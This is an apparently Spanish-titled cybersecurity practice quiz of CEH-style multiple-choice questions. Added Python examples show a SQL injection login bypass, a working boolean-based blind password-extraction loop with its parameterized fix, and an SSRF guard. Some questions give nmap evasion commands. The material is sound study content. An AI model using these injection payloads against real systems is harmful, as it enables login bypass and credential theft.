Test 2 CiberSeguridad
Test title: Test 2 CiberSeguridad. Description: Great goal down the right.




In this form of encryption algorithm, every individual block contains 64-bit data, and three keys are used, where each key consists of 56 bits. Which is this encryption algorithm?
A. IDEA
B. Triple Data Encryption Standard
C. AES
D. MD5 encryption algorithm

John is investigating web-application firewall logs and observes that someone is attempting to inject the following: [injected payload not shown]. What type of attack is this?
A. SQL injection
B. Buffer overflow
C. CSRF
D. XSS

John, a professional hacker, performs a network attack on a renowned organization and gains unauthorized access to the target network. He remains in the network without being detected for a long time and obtains sensitive information without sabotaging the organization. Which of the following attack techniques is used by John?
A. Insider threat
B. Diversion theft
C. Spear-phishing sites
D. Advanced persistent threat

You are attempting to run an Nmap port scan on a web server. Which of the following commands would result in a scan of common ports with the least amount of noise in order to evade IDS?
A. nmap -A -Pn
B. nmap -sP -p-65535 -T5
C. nmap -sT -O -T0
D. nmap -A --host-timeout 99 -T1

This wireless security protocol allows 192-bit minimum-strength security protocols and cryptographic tools to protect sensitive data, such as GCMP-256, HMAC-SHA384, and ECDSA using a 384-bit elliptic curve. Which is this wireless security protocol?
A. WPA3-Personal
B. WPA3-Enterprise
C. WPA2-Enterprise
D. WPA2-Personal

Which common file on a web server can be misconfigured and provide useful information for a hacker, such as verbose error messages?
A. httpd.conf
B. administration.conf
C. php.ini
D. idq.dll

Gerard, a disgruntled ex-employee of Sunglass IT Solutions, targets this organization to perform sophisticated attacks and bring down its reputation in the market. To launch the attack process, he performed DNS footprinting to gather information about DNS servers and to identify the hosts connected in the target network. He used an automated tool that can retrieve information about DNS zone data, including DNS domain names, computer names, IP addresses, DNS records, and network Whois records. He further exploited this information to launch other sophisticated attacks. What is the tool employed by Gerard in the above scenario?
A. Towelroot
B. Knative
C. zANTI
D. Bluto

Tony is a penetration tester tasked with performing a penetration test. After gaining initial access to a target system, he finds a list of hashed passwords. Which of the following tools would not be useful for cracking the hashed passwords?
A. Hashcat
B. John the Ripper
C. THC-Hydra
D. netcat

An organization is performing a vulnerability assessment for mitigating threats. James, a pen tester, scanned the organization by building an inventory of the protocols found on the organization's machines to detect which ports are attached to services such as an email server, a web server, or a database server. After identifying the services, he selected the vulnerabilities on each machine and started executing only the relevant tests. What is the type of vulnerability assessment solution that James employed in the above scenario?
A. Service-based solutions
B. Product-based solutions
C. Tree-based assessment
D. Inference-based assessment

Taylor, a security professional, uses a tool to monitor her company's website, analyze the website's traffic, and track the geographical location of the users visiting the company's website. Which of the following tools did Taylor employ in the above scenario?
A. Webroot
B. Web-Stat
C. WebSite-Watcher
D. WAFW00F

Harry, a professional hacker, targets the IT infrastructure of an organization. After preparing for the attack, he attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these techniques, he successfully deployed malware on the target system to establish an outbound connection. What is the APT lifecycle phase that Harry is currently executing?
A. Initial intrusion
B. Persistence
C. Cleanup
D. Preparation

Robin, a professional hacker, targeted an organization's network to sniff all the traffic. During this process, Robin plugged a rogue switch into an unused port in the LAN with a priority lower than any other switch in the network, so that he could make it the root bridge, which would later allow him to sniff all the traffic in the network. What is the attack performed by Robin in the above scenario?
A. ARP spoofing attack
B. STP attack
C. DNS poisoning attack
D. VLAN hopping attack

Bobby, an attacker, targeted a user and decided to hijack and intercept all their wireless communications. He installed a fake communication tower between two authentic endpoints to mislead the victim. Bobby used this virtual tower to interrupt the data transmission between the user and the real tower, attempting to hijack an active session. Upon receiving the user's request, Bobby manipulated the traffic with the virtual tower and redirected the victim to a malicious website. What is the attack performed by Bobby in the above scenario?
A. aLTEr attack
B. Jamming signal attack
C. Wardriving
D. KRACK attack

John, a professional hacker, targeted an organization that uses LDAP for accessing distributed directory services. He used an automated tool to anonymously query the LDAP service for sensitive information such as usernames, addresses, departmental details, and server names to launch further attacks on the target organization. What is the tool employed by John to gather information from the LDAP service?
A. ike-scan
B. Zabasearch
C. JXplorer
D. EarthExplorer

Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application she is working on. She utilizes a component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks. What is the component of the Docker architecture used by Annie in the above scenario?
A. Docker objects
B. Docker daemon
C. Docker client
D. Docker registries

Bob, an attacker, has managed to access a target IoT device. He employed an online tool to gather information related to the model of the IoT device and the certifications granted to it. Which of the following tools did Bob employ to gather the above information?
A. FCC ID search
B. Google image search
C. search.com
D. EarthExplorer

What piece of hardware on a computer's motherboard generates encryption keys and only releases a part of the key, so that decrypting a disk on a new piece of hardware is not possible?
A. CPU
B. UEFI
C. GPU
D. TPM

Gilbert, a web developer, uses a centralized web API to reduce complexity and increase the integrity of updating and changing data. For this purpose, he uses a web service that uses HTTP methods such as PUT, POST, GET, and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application. What is the type of web-service API mentioned in the above scenario?
A. RESTful API
B. JSON-RPC
C. SOAP API
D. REST API

To create a botnet, the attacker can use several techniques to scan vulnerable machines. The attacker first collects information about a large number of vulnerable machines to create a list. Subsequently, they infect the machines. The list is divided by assigning half of the list to the newly compromised machines. The scanning process runs simultaneously. This technique ensures the spreading and installation of malicious code in little time. Which technique is discussed here?
A. Subnet scanning technique
B. Permutation scanning technique
C. Hit-list scanning technique
D. Topological scanning technique

Nicolas just found a vulnerability on a public-facing system that is considered a zero-day vulnerability. He sent an email to the owner of the public system describing the problem and how the owner can protect themselves from that vulnerability. He also sent an email to Microsoft informing them of the problem that their systems are exposed to. What type of hacker is Nicolas?
A. Black hat
B. White hat
C. Gray hat
D. Red hat

John, a disgruntled ex-employee of an organization, contacted a professional hacker to exploit the organization. In the attack process, the professional hacker installed a scanner on a machine belonging to one of the victims and scanned several machines on the same network to identify vulnerabilities to perform further exploitation. What is the type of vulnerability assessment tool employed in the above scenario?
A. Agent-based scanner
B. Network-based scanner
C. Cluster scanner
D. Proxy scanner

Dorian is sending a digitally signed email to Poly. With which key is Dorian signing this message, and how is Poly validating it?
A. Dorian is signing the message with his public key, and Poly will verify that the message came from Dorian by using Dorian's private key.
B. Dorian is signing the message with Poly's private key, and Poly will verify that the message came from Dorian by using Dorian's public key.
C. Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by using Dorian's public key.
D. Dorian is signing the message with Poly's public key, and Poly will verify that the message came from Dorian by using Dorian's public key.

Boney, a professional hacker, targets an organization for financial benefit. He performs an attack by sending his session ID using an MITM attack technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session ID to the target employee. The session ID links the target employee to Boney's account page without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive payment details entered in a form are linked to Boney's account. What is the attack performed by Boney in the above scenario?
A. Forbidden attack
B. CRIME attack
C. Session donation attack
D. Session fixation attack

Kevin, a professional hacker, wants to penetrate CyberTech Inc's network. He employed a technique in which he encoded packets with Unicode characters. The company's IDS cannot recognize the packets, but the target web server can decode them. What is the technique used by Kevin to evade the IDS?
A. Session splicing
B. Urgency flag
C. Obfuscating
D. Desynchronization

Suppose that you test an application for the SQL injection vulnerability. You know that the backend database is based on Microsoft SQL Server. In the login/password form, you enter the following credentials: [credentials and the remainder of the question not shown]
A. select * from Users where UserName = 'attack' ' or 1=1 -- and UserPassword = '123456'
B. select * from Users where UserName = 'attack' or 1=1 -- and UserPassword = '123456'
C. select * from Users where UserName = 'attack or 1=1 -- and UserPassword = '123456'
D. select * from Users where UserName = 'attack' or 1=1 --' and UserPassword = '123456'

Which of the following commands checks for valid users on an SMTP server?
A. RCPT
B. CHK
C. VRFY
D. EXPN

Bella, a security professional working at an IT firm, finds that a security breach has occurred while transferring important files. Sensitive employee usernames and passwords are shared in plaintext, paving the way for hackers to perform successful session hijacking. To address this situation, Bella implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols is used by Bella?
A. FTPS
B. FTP
C. HTTPS
D. IP

John wants to send Marie an email that includes sensitive information, and he does not trust the network that he is connected to. Marie gives him the idea of using PGP. What should John do to communicate correctly using this type of encryption?
A. Use his own private key to encrypt the message.
B. Use his own public key to encrypt the message.
C. Use Marie's private key to encrypt the message.
D. Use Marie's public key to encrypt the message.
In the Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, what range does a medium vulnerability fall in?
A. 4.0-6.0
B. 3.9-6.9
C. 3.0-6.9
D. 4.0-6.9

Bill is a network administrator. He wants to eliminate unencrypted traffic inside his company's network. He decides to set up a SPAN port to capture all traffic to the datacenter. He immediately discovers unencrypted traffic on a UDP port. What protocol is this port using, and how can he secure that traffic?
A. RPC, and the best practice is to disable RPC completely.
B. SNMP, and he should change it to SNMP v3.
C. SNMP, and he should change it to SNMP v2, which is encrypted.
D. It is not necessary to perform any actions, as SNMP is not carrying important information.

Bob was recently hired by a medical company after it experienced a major cyber security breach. Many patients are complaining that their personal medical records are fully exposed on the Internet and someone can find them with a simple Google search. Bob's boss is very worried because of the regulations that protect those data. Which of the following regulations is mostly violated?
A. PCI DSS
B. PII
C. ISO 2002
D. HIPAA/PHI

Infecting a system with malware and using phishing to gain credentials to a system or web application are examples of which phase of the ethical hacking methodology?
A. Scanning
B. Gaining access
C. Maintaining access
D. Reconnaissance

Larry, a security professional in an organization, has noticed some abnormalities in the user accounts on a web server. To thwart evolving attacks, he decided to harden the security of the web server by adopting a few countermeasures to secure the accounts on the web server. Which of the following countermeasures must Larry implement to secure the user accounts on the web server?
A. Retain all unused modules and application extensions.
B. Limit the administrator or root-level access to the minimum number of users.
C. Enable all non-interactive accounts that should exist but do not require interactive login.
D. Enable unused default user accounts created during the installation of an OS.

There are multiple cloud deployment options depending on how isolated a customer's resources are from those of other customers. Shared environments share the costs and allow each customer to enjoy lower operations expenses. One solution is for a customer to join with a group of users or organizations to share a cloud environment. What is this cloud deployment option called?
A. Private
B. Community
C. Public
D. Hybrid

Don, a student, came across a gaming app in a third-party app store and installed it. Subsequently, all the legitimate apps in his smartphone were replaced by deceptive applications that appeared legitimate. He also received many advertisements on his smartphone after installing the app. What is the attack performed on Don in the above scenario?
A. SIM card attack
B. Clickjacking
C. SMS phishing attack
D. Agent Smith attack

Samuel, a security administrator, is assessing the configuration of a web server. He noticed that the server permits SSLv2 connections, and the same private key certificate is used on a different server that allows SSLv2 connections. This vulnerability makes the web server vulnerable to attacks, as the SSLv2 server can leak key information. Which of the following attacks can be performed by exploiting the above vulnerability?
A. Padding oracle attack
B. DROWN attack
C. DUHK attack
D. Side-channel attack

Clark, a professional hacker, was hired by an organization to gather sensitive information about its competitors surreptitiously. Clark gathers the server IP address of the target organization using Whois footprinting. Further, he entered the server IP address as input to an online tool to retrieve information such as the network range of the target organization and to identify the network topology and operating system used in the network. What is the online tool employed by Clark in the above scenario?
A. DuckDuckGo
B. AOL
C. ARIN
D. Baidu
You are a penetration tester and are about to perform a scan on a specific server. The agreement that you signed with the client contains the following specific condition for the scan: "The attacker must scan every port on the server several times using a set of spoofed source addresses." Suppose that you are using Nmap to perform this scan. What flag will you use to satisfy this requirement?
A. The -g flag
B. The -A flag
C. The -f flag
D. The -D flag

Abel, a security professional, conducts penetration testing in his client organization to check for any security loopholes. He launched an attack on the DHCP servers by broadcasting forged DHCP requests and leased all the DHCP addresses available in the DHCP scope until the server could not issue any more IP addresses. This led to a DoS attack, and as a result, legitimate employees were unable to access the client's network. Which of the following attacks did Abel perform in the above scenario?
A. Rogue DHCP server attack
B. VLAN hopping
C. STP attack
D. DHCP starvation

This form of encryption algorithm is a symmetric key block cipher that is characterized by a 128-bit block size, and its key size can be up to 256 bits. Which among the following is this encryption algorithm?
A. HMAC encryption algorithm
B. Twofish encryption algorithm
C. IDEA
D. Blowfish encryption algorithm

Jim, a professional hacker, targeted an organization that is operating critical industrial infrastructure. Jim used Nmap to scan open ports and running services on systems connected to the organization's OT network. He used an Nmap command to identify EtherNet/IP devices connected to the Internet and further gathered information such as the vendor name, product code and name, device name, and IP address. Which of the following Nmap commands helped Jim retrieve the required information?
A. nmap -Pn -sT --scan-delay 1s --max-parallelism 1 -p <Port List> <Target IP>
B. nmap -Pn -sU -p 44818 --script enip-info <Target IP>
C. nmap -Pn -sT -p 46824 <Target IP>
D. nmap -Pn -sT -p 102 --script s7-info <Target IP>

While testing a web application in development, you notice that the web server does not properly ignore the "dot dot slash" (../) character string and instead returns the file listing of a folder higher up in the folder structure of the server. What kind of attack is possible in this scenario?
A. Cross-site scripting
B. SQL injection
C. Denial of service
D. Directory traversal

Susan, a software developer, wants her web API to update other applications with the latest information. For this purpose, she uses user-defined HTTP callbacks or push APIs that are raised based on trigger events; when invoked, this feature supplies data to other applications so that users can instantly receive real-time information. Which of the following techniques is employed by Susan?
A. Web shells
B. Webhooks
C. REST API
D. SOAP API

Which iOS jailbreaking technique patches the kernel during the device boot so that it becomes jailbroken after each successive reboot?
A. Tethered jailbreaking
B. Semi-untethered jailbreaking
C. Semi-tethered jailbreaking
D. Untethered jailbreaking

Stella, a professional hacker, performs an attack on web services by exploiting a vulnerability that provides additional routing information in the SOAP header to support asynchronous communication. This further allows the transmission of web-service requests and response messages using different TCP connections. Which of the following attack techniques is used by Stella to compromise the web services?
A. Web services parsing attacks
B. WS-Address spoofing
C. SOAPAction spoofing
D. XML injection

What is the port to block first in case you are suspicious that an IoT device has been compromised?
A. 22
B. 48101
C. 80
D. 443

Clark is a professional hacker. He created and configured multiple domains pointing to the same host to switch quickly between the domains and avoid detection. Identify the behavior of the adversary in the above scenario.
A. Unspecified proxy activities
B. Use of command-line interface
C. Data staging
D. Use of DNS tunneling

What firewall evasion scanning technique makes use of a zombie system that has low network activity as well as its fragment identification numbers?
A. Packet fragmentation scanning
B. Spoof source address scanning
C. Decoy scanning
D. Idle scanning

By performing a penetration test, you gained access under a user account. During the test, you established a connection with your own machine via the SMB service and occasionally entered your login and password in plaintext. Which file do you have to clean to clear the password?
A. .xsession-log
B. .profile
C. .bashrc
D. .bash_history

Wilson, a professional hacker, targets an organization for financial benefit and plans to compromise its systems by sending malicious emails. For this purpose, he uses a tool to track the emails of the target and extracts information such as sender identities, mail servers, sender IP addresses, and sender locations from different public sources. He also checks if an email address was leaked using the haveibeenpwned.com API. Which of the following tools is used by Wilson in the above scenario?
A. Factiva
B. ZoomInfo
C. Netcraft
D. Infoga

Alice, a professional hacker, targeted an organization's cloud services. She infiltrated the target's MSP provider by sending spear-phishing emails and distributed custom-made malware to compromise user accounts and gain remote access to the cloud service. Further, she accessed the target customer profiles with her MSP account, compressed the customer data, and stored them in the MSP. Then, she used this information to launch further attacks on the target organization. Which of the following cloud attacks did Alice perform in the above scenario?
A. Cloud cryptojacking
B. Man-in-the-cloud (MITC) attack
C. Cloud hopper attack
D. Cloudborne attack

Judy created a forum. One day, she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden behind those images: [code not shown]. What issue occurred for the users who clicked on the image?
A. This PHP file silently executes the code and grabs the user's session cookie and session ID.
B. The code redirects the user to another site.
C. The code injects a new cookie into the browser.
D. The code is a virus that is attempting to gather the user's username and password.

Ethical hacker Jane Smith is attempting to perform an SQL injection attack. She wants to test the response time of a true or false response and wants to use a second command to determine whether the database will return true or false results for user IDs. Which two SQL injection types would give her the results she is looking for?
A. Out-of-band and boolean-based
B. Union-based and error-based
C. Time-based and union-based
D. Time-based and boolean-based

Jason, an attacker, targeted an organization to perform an attack on its Internet-facing web server with the intention of gaining access to backend servers, which are protected by a firewall. In this process, he used the URL https://xyz.com/feed.php?url=externalsite.com/feed/ to obtain a remote feed and altered the URL input to the local host to view all the local resources on the target server. What is the type of attack Jason performed in the above scenario?
A. Web server misconfiguration
B. Server-side request forgery (SSRF) attack
C. Web cache poisoning attack
D. Website defacement

George is a security professional working for iTech Solutions. He was tasked with securely transferring sensitive data of the organization between industrial systems. In this process, he used a short-range communication protocol based on the IEEE 802.15.4 standard. This protocol is used in devices that transfer data infrequently at a low rate in a restricted area, within a range of 10-100 m. What is the short-range wireless communication technology George employed in the above scenario?
A. LPWAN
B. MQTT
C. NB-IoT
D. Zigbee
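The login-form question earlier on the page (the `select * from Users where UserName = ... and UserPassword = ...` query options) and Jane's boolean-based question above rest on the same mechanism. The following is an added example, not from the quiz: the vulnerable query assembled by string concatenation against a constructed in-memory SQLite table (the question names Microsoft SQL Server; the concatenation flaw and the payload are identical), the `attack' or 1=1 --` login bypass, a boolean-based blind loop that recovers a password one character at a time from nothing but true/false login answers, and the parameterized fix. The table, its rows and the function names are this example's own.

```python
"""SQL injection against the quiz's login query, boolean-based blind
extraction, and the parameterized fix.

Added example, not from the quiz. The table and its rows are constructed
here in an in-memory SQLite database (the question names Microsoft SQL
Server; the string-concatenation flaw and the payloads are the same).
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, UserPassword TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("alice", "Winter2024!"), ("bob", "hunter2")])
    return conn


def build_query_vulnerable(username: str, password: str) -> str:
    """The broken pattern: untrusted input pasted into the SQL text.
    With username  attack' or 1=1 --  this yields the query from the quiz:
    the quote closes the string, `or 1=1` is always true, and `--` comments
    out the password check."""
    return ("select * from Users where UserName = '" + username
            + "' and UserPassword = '" + password + "'")


def login_vulnerable(conn, username: str, password: str) -> bool:
    row = conn.execute(build_query_vulnerable(username, password)).fetchone()
    return row is not None


def login_safe(conn, username: str, password: str) -> bool:
    """Fixed: bound parameters, so a quote in the input is only data."""
    row = conn.execute(
        "select * from Users where UserName = ? and UserPassword = ?",
        (username, password)).fetchone()
    return row is not None


def blind_extract_password(oracle, victim: str, max_len: int = 32) -> str:
    """Boolean-based blind SQLi: `oracle(username)` only reports whether the
    login succeeded, yet that one bit is enough to read the victim's
    password character by character.  A time-based variant would swap the
    comparison for a conditional delay (e.g. WAITFOR DELAY on SQL Server)
    and measure response time instead of reading a true/false page."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789!_-"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = f"{victim}' and substr(UserPassword,{pos},1)='{ch}' --"
            if oracle(payload):
                recovered += ch
                break
        else:
            break          # no candidate matched: end of the value
    return recovered


if __name__ == "__main__":
    db = make_db()
    print(build_query_vulnerable("attack' or 1=1 --", "123456"))
    print("bypass works:", login_vulnerable(db, "attack' or 1=1 --", "123456"))
    print("fixed:", login_safe(db, "attack' or 1=1 --", "123456"))
    print("bob's password:", blind_extract_password(
        lambda user: login_vulnerable(db, user, ""), "bob"))
```

The blind loop never sees a row of data; it only sees whether the injected condition made the login succeed, which is exactly the distinction Jane's question draws between boolean-based and time-based inference.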
You are a penetration tester tasked with testing the wireless network of your client Brakeme SA. You are attempting to break into the wireless network with the SSID "Brakeme-Internal." You realize that this network uses WPA3 encryption. Which of the following vulnerabilities is the most promising to exploit?
A. Cross-site request forgery
B. Dragonblood
C. Key reinstallation attack
D. AP misconfiguration

What is the common name for a vulnerability disclosure program opened by companies on platforms such as HackerOne?
A. White-hat hacking program
B. Bug bounty program
C. Ethical hacking program
D. Vulnerability hunting program

A DDoS attack is performed at layer 7 to take down web infrastructure. Partial HTTP requests are sent to the web infrastructure or applications. Upon receiving a partial request, the target server opens multiple connections and keeps waiting for the requests to complete. Which attack is being described here?
A. Desynchronization
B. Slowloris attack
C. Session splicing
D. Phlashing

Andrew is an ethical hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in a given target network. Which of the following host discovery techniques must he use to perform the given task?
A. UDP scan
B. ARP ping scan
C. ACK flag probe scan
D. TCP Maimon scan

Abel, a cloud architect, uses container technology to deploy applications/software including all its dependencies, such as libraries and configuration files, binaries, and other resources that run independently from other processes in the cloud environment. For the containerization of applications, he follows the five-tier container technology architecture. Currently, Abel is verifying and validating image contents, signing images, and sending them to the registries. Which of the following tiers of the container technology architecture is Abel currently working in?
A. Tier-1: Developer machines
B. Tier-2: Testing and accreditation systems
C. Tier-3: Registries
D. Tier-4: Orchestrators
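Jason's SSRF question above describes a feed fetcher whose `url` parameter is pointed at the local host. The following is an added example, not from the quiz: the vulnerable feature is simply "fetch whatever URL the user supplied", so the fix is a check that resolves the hostname and refuses anything that is not a globally routable address reached over plain http(s), failing closed when resolution fails, plus a helper that pins the connection to the address that was checked so the check cannot be undone by DNS rebinding. All functions are this example's own; the sample URLs are constructed and need no network (IP literals and `localhost` resolve locally), and 93.184.216.34 is used only as an arbitrary public address.

```python
"""SSRF guard for a "fetch a remote feed by URL" feature.

Added example, not from the quiz. The vulnerable version of the feature is
just `fetch(url)`: feed.php?url=externalsite.com/feed/ can be changed to
http://localhost/..., http://169.254.169.254/... or file:///etc/passwd and
the server fetches it from its own network position.  The guard below
resolves the host and rejects anything that is not a globally routable
address over plain http(s).  Runs offline: the sample URLs use IP literals
and `localhost`, which need no DNS.
"""
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}


def resolve_all(host: str):
    """Every address the host maps to (v4 and v6); empty list on failure."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    # Drop any IPv6 scope id (fe80::1%eth0) before parsing.
    return [ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos]


def is_safe_target(url: str) -> bool:
    """True only for http(s) URLs whose host resolves exclusively to
    globally routable addresses.  Loopback, RFC 1918, link-local (cloud
    metadata at 169.254.169.254), CGNAT, documentation ranges and ::1 are
    all rejected by `is_global`; an unresolvable host fails closed."""
    parts = urlparse(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    addrs = resolve_all(parts.hostname)
    if not addrs:
        return False
    return all(addr.is_global for addr in addrs)


def pinned_target(url: str):
    """Return (scheme, ip, port, path) to connect to, or None when rejected.
    Connecting to the checked IP instead of re-resolving the name closes
    the DNS-rebinding window between the check and the fetch."""
    if not is_safe_target(url):
        return None
    parts = urlparse(url)
    ip = resolve_all(parts.hostname)[0]
    port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    return parts.scheme.lower(), str(ip), port, parts.path or "/"


if __name__ == "__main__":
    for candidate in ("http://93.184.216.34/feed/", "http://localhost/",
                      "http://169.254.169.254/latest/meta-data/",
                      "file:///etc/passwd"):
        print(candidate, "->", pinned_target(candidate))
```

Redirects need the same treatment: a fetcher that follows `Location` headers must re-run the check on every hop, otherwise an allowed public host can redirect the server straight back to `http://127.0.0.1/`.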
Daniel is a professional hacker who is attempting to perform an SQL injection attack on a target website, www.moviescope.com. During this process, he encountered an IDS that detects SQL injection attempts based on predefined signatures. To evade any comparison statement, he attempted placing characters such as "' or '1'='1'" in any basic injection statement such as "or 1=1." Identify the evasion technique used by Daniel in the above scenario.
A. Char encoding
B. IP fragmentation
C. Variation
D. Null byte

SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may bypass authentication and allow attackers to access and/or modify data attached to a web application. Which of the following SQLi types leverages a database server's ability to make DNS requests to pass data to an attacker?
A. In-band SQLi
B. Union-based SQLi
C. Out-of-band SQLi
D. Time-based blind SQLi

Attacker Rony installed a rogue access point within an organization's perimeter and attempted to intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack. What is the type of vulnerability assessment performed by Johnson in the above scenario?
A. Wireless network assessment
B. Application assessment
C. Host-based assessment
D. Distributed assessment

In this attack, an adversary tricks a victim into reinstalling an already-in-use key. This is achieved by manipulating and replaying cryptographic handshake messages. When the victim reinstalls the key, associated parameters such as the incremental transmit packet number and receive packet number are reset to their initial values. What is this attack called?
A. Evil twin
B. Chop chop attack
C. Wardriving
D. KRACK

After an audit, the auditors inform you that there is a critical finding that you must tackle immediately. You read the audit report, and the problem is the service running on port 389. Which service is this, and how can you tackle the problem?
A. The service is NTP, and you have to change it from UDP to TCP in order to encrypt it.
B. The service is LDAP, and you must change it to 636, which is LDAPS.
C. The findings do not require immediate actions and are only suggestions.
D. The service is SMTP, and you must change it to S/MIME, which is an encrypted way to send emails.

You are using a public Wi-Fi network inside a coffee shop. Before surfing the web, you use your VPN to prevent intruders from sniffing your traffic. If you did not have a VPN, how would you identify whether someone is performing an ARP spoofing attack on your laptop?
A. You should check your ARP table and see if there is one IP address with two different MAC addresses.
B. You should scan the network using Nmap to check the MAC addresses of all the hosts and look for duplicates.
C. You should use netstat to check for any suspicious connections with another IP address within the LAN.
D. You cannot identify such an attack and must use a VPN to protect your traffic.

Emily, an extrovert obsessed with social media, posts a large amount of private information, photographs, and location tags of recently visited places. Realizing this, James, a professional hacker, targets Emily and her acquaintances, conducts a location search to detect their geolocation by using an automated tool, and gathers information to perform other sophisticated attacks. What is the tool employed by James in the above scenario?
A. ophcrack
B. VisualRoute
C. Hootsuite
D. HULK

Alice needs to send a confidential document to her coworker, Bryan. Their company has a public key infrastructure set up. Therefore, Alice both encrypts the message and digitally signs it. Alice uses _______________ to encrypt the message, and Bryan uses _______________ to confirm the digital signature.
A. Bryan's public key; Bryan's public key
B. Alice's public key; Alice's public key
C. Bryan's private key; Alice's public key
D. Bryan's public key; Alice's public key

What is the file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android application?
A. AndroidManifest.xml
B. classes.dex
C. APK.info
D. resources.arsc

Mason, a professional hacker, targets an organization and spreads Emotet malware through a malicious script. After infecting the victim's device, Mason further used Emotet to spread the infection across local networks and beyond to compromise as many machines as possible. In this process, he used a tool, which is a self-extracting RAR file, to retrieve information related to network resources such as writable share drives. What is the tool employed by Mason in the above scenario?
A. NetPass.exe
B. Outlook scraper
C. WebBrowserPassView
D. Credential enumerator

Which of the following Bluetooth hacking techniques refers to the theft of information from a wireless device through Bluetooth?
A. Bluesmacking
B. Bluesnarfing
C. Bluejacking
D. Bluebugging

While browsing his Facebook feed, Matt sees a picture one of his friends posted with the caption "Learn more about your friends!", as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms that he did indeed post it. With assurance that the post is legitimate, Matt responds to the questions on the post. A few days later, Matt's bank account has been accessed, and the password has been changed. What most likely happened?
A. Matt inadvertently provided the answers to his security questions when responding to the post.
B. Matt inadvertently provided his password when responding to the post.
C. Matt's computer was infected with a keylogger.
D. Matt's bank-account login information was brute forced.

Steve, an attacker, created a fake profile on a social media website and sent a request to Stella. Stella was enthralled by Steve's profile picture and the description given for his profile, and she initiated a conversation with him soon after accepting the request. After a few days, Steve started talking about her company details and eventually gathered all the essential information regarding her company. What is the social engineering technique Steve employed in the above scenario?
A. Baiting
B. Piggybacking
C. Diversion theft
D. Honey trap

At what stage of the cyber kill chain model does data exfiltration occur?
A. Weaponization
B. Actions on objectives
C. Command and control
D. Installation

Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He found the contact number of sibertech.org and dialed the number, claiming to represent a technical support team from a vendor. He warned that a specific server was about to be compromised and requested sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious files, which were then used to collect and pass critical information to Johnson's machine. What is the social engineering technique Johnson employed in the above scenario?
A. Diversion theft
B. Quid pro quo
C. Elicitation
D. Phishing

Sam is a penetration tester hired by Inception Tech, a security organization. He was asked to perform port scanning on a target host in the network. While performing the given task, Sam sends FIN/ACK probes and determines that an RST packet is sent in response by the target host, indicating that the port is closed. What is the port scanning technique used by Sam to discover open ports?
A. Xmas scan
B. IDLE/IPID header scan
C. TCP Maimon scan
D. ACK flag probe scan

An organization has automated the operation of critical infrastructure from a remote location. For this purpose, all the industrial control systems are connected to the Internet. To empower the manufacturing process, ensure the reliability of industrial networks, and reduce downtime and service disruption, the organization decided to install an OT security tool that further protects against security incidents such as cyber espionage, zero-day attacks, and malware. Which of the following tools must the organization employ to protect its critical infrastructure?
A. Robotium
B. BalenaCloud
C. Flowmon
D. IntentFuzzer

Heather's company has decided to use a new customer relationship management tool. After performing the appropriate research, they decided to purchase a subscription to a cloud-hosted solution. The only administrative task that Heather will need to perform is the management of user accounts. The provider will take care of the hardware, operating system, and software administration, including patching and monitoring. Which of the following is this type of solution?
A. IaaS
B. SaaS
C. PaaS
D. CaaS

Which of the following protocols can be used to secure an LDAP service against anonymous queries?
A. NTLM
B. RADIUS
C. WPA
D. SSO

During the enumeration phase, Lawrence performs banner grabbing to obtain information such as OS details and versions of services running. The service that he enumerated runs directly on TCP port 445. Which of the following services is enumerated by Lawrence in this scenario?
A. Remote procedure call (RPC)
B. Telnet
C. Server Message Block (SMB)
D. Network File System (NFS)

Which file is a rich target to discover the structure of a website during web-server footprinting?
A. domain.txt
B. Robots.txt
C. Document root
D. index.html

John, a professional hacker, decided to use DNS to perform data exfiltration on a target network. In this process, he embedded malicious data in the DNS protocol packets that even DNSSEC cannot detect. Using this technique, John successfully injected malware to bypass a firewall and maintained communication between the victim machine and the C&C server. What is the technique employed by John to bypass the firewall?
A. DNSSEC zone walking
[remaining options not shown on the page]
